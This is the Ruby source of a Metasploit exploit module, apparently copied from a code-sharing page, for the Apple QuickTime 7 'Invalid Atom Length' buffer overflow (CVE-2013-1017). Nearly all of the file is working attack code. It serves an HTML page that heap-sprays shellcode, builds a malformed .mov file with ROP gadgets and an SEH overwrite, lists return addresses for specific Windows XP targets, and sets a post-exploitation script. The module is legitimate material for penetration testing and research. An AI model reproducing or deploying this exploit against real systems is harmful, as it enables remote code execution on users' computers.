Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::RopDb
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
15
      'Description'    => %q{
16
        This module exploits a vulnerability found in Apple Quicktime. The flaw is
17
        triggered when Quicktime fails to properly handle the data length for certain
18
        atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
19
        overflow by loading a specially crafted .mov file, and allows arbitrary
20
        code execution under the context of the current user.
21
      },
22
      'License'        => MSF_LICENSE,
23
      'Author'         =>
24
        [
25
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
26
          'Tom Gallagher', # Original Discovery (overlapped)
27
          'Paul Bates',    # Original Discovery (overlapped)
28
          'sinn3r'         # Metasploit
29
        ],
30
      'References'     =>
31
        [
32
          [ 'CVE', '2013-1017' ],
33
          [ 'OSVDB', '93625' ],
34
          [ 'BID', '60097' ],
35
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],
36
          [ 'ZDI', '13-110' ]
37
        ],
38
      'Platform'       => 'win',
39
      'Targets'        =>
40
        [
41
          # All of the following addresses are from Quicktime.qts
42
          # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
43
          [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
44
          [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
45
          [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
46
          [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
47
        ],
48
      'Payload'        =>
49
        {
50
          'BadChars'        => "\x00"  # js_property_spray no like nilz
51
        },
52
      'DefaultOptions'  =>
53
        {
54
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
55
        },
56
      'Privileged'     => false,
57
      'DisclosureDate' => '2013-05-22'
58
    ))
59
  end
60

61
  def get_payload(t)
62
    alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
63
    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
64
    return p
65
  end
66

67

68
  def targetable?(agent)
69
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
70
      return true
71
    elsif agent =~ /contype/
72
      # contype: a mov file request from Apple Quicktime
73
      return true
74
    end
75

76
    false
77
  end
78

79

80
  def get_html(t)
81
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
82
    fake_mov_name = rand_text_alpha(4) + ".mov"
83
    html = %Q|
84
    <html>
85
    <head>
86
    <script>
87
    #{js_property_spray}
88

89
    var s = unescape("#{js_p}");
90
    sprayHeap({shellcode:s});
91
    </script>
92
    </head>
93
    <body>
94
    <embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
95
    </body>
96
    </html>
97
    |
98

99
    html.gsub(/^ {4}/, '')
100
  end
101

102

103
  def on_request_uri(cli, request)
104
    agent = request.headers['User-Agent']
105
    print_status("Requesting: #{request.uri}")
106

107
    unless targetable?(agent)
108
      print_error("Browser not supported, sending 404: #{agent}")
109
      send_not_found(cli)
110
      return
111
    end
112

113
    print_status("Target selected as: #{target.name}") if target
114

115
    if request.uri =~ /\.mov$/
116
      print_status("Sending specially crafted .mov file")
117
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
118
    else
119
      html = get_html(target)
120
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
121
    end
122
  end
123

124
  def sort_bytes(data)
125
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
126
  end
127

128
  def rop_nop(t)
129
    [t['Nop']].pack('V*')                    # Ret (QuickTime.qts)
130
  end
131

132
  def exploit
133
    buf = ''
134
    buf << rand_text_alpha(467)              # 467 to align the pivot
135
    10.times {
136
      buf << rop_nop(target)
137
    }
138
    buf << [
139
      target['Pop'],                       # POP ESP; RET (QuickTime.qts)
140
      0x20302020                           # Target value for ESP (our ROP payload)
141
    ].pack('V*')
142
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
143
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
144
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size
145

146
    # Quicktime File Format Specifications:
147
    # https://developer.apple.com/standards/qtff-2001.pdf
148
    mov  = "\x00\x00\x06\xDF"                # File size
149
    mov << "moov"                            # Movie atom
150
    mov << "\x00\x00\x06\xD7"                # size (1751d)
151
    mov << "rmra"                            # Reference Movie atom
152
    mov << "\x00\x00\x06\xCF"                # size (1743d)
153
    mov << "rmda"                            # rmda atom
154
    mov << "\x00\x00\x06\xBF"                # size (1727d)
155
    mov << "rdrf"                            # Data reference atom
156
    mov << "\x00\x00\x00\x00"                # size set to 0
157
    mov << "alis"                            # Data reference type: FS alias record
158
    mov << "\x00\x00\x06\xAA"                # Size (1706d)
159
    mov << rand_text_alpha(8)
160
    mov << "\x00\x00\x06\x61"                # Size (1633d)
161
    mov << rand_text_alpha(38)
162
    mov << "\x12"
163
    mov << rand_text_alpha(81)
164
    mov << "\xFF\xFF"
165
    mov << rand_text_alpha(18)
166
    mov << "\x00\x08"                        # Size (8d)
167
    mov << rand_text_alpha(8)
168
    mov << "\x00\x00"
169
    mov << "\x00\x08"                        # Size (8d)
170
    mov << rand_text_alpha(8)
171
    mov << "\x00\x00"
172
    mov << "\x00\x26"                        # Size (38d)
173
    mov << rand_text_alpha(38)
174
    mov << "\x00\x0F\x00\x0E"
175
    mov << "AA"                              # Size (must be invalid)
176
    mov << rand_text_alpha(12)
177
    mov << "\x00\x12\x00\x21"
178
    mov << rand_text_alpha(36)
179
    mov << "\x00"
180
    mov << "\x0F\x33"
181
    mov << rand_text_alpha(17)
182
    mov << "\x02\xF4"                        # Size (756h)
183
    mov << rand_text_alpha(756)
184
    mov << "\xFF\xFF\x00\x00\x00"
185
    mov << buf
186

187
    @exploit = mov
188
    super
189
  end
190
end
191

192